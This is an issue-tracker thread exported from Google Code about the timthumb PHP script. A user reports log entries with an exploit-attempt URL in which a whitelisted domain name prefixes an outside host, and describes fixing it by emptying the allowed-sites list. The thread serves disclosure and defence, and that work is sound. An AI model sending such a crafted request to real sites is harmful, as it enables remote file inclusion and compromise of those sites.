mcsavadhar / timthumb

Automatically exported from code.google.com/p/timthumb
0 stars 0 forks source link

timthumb.php?src=http://flickr.com.curcubeu.eu/login.php #488

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
What steps will reproduce the problem?
1. Seeing logs with attempts like 
timthumb.php?src=http://flickr.com.curcubeu.eu/login.php

Please provide any additional information below.
Apparent attempts, using the whitelisted domains

Original issue reported on code.google.com by ejh...@gmail.com on 28 Jul 2014 at 5:58

GoogleCodeExporter commented 8 years ago
Appears that this is an exploit, wanted to bring it to your attention. I 
resolved by removing any of the default sits from the allowed sites list. 

Original comment by ejh...@gmail.com on 28 Jul 2014 at 6:30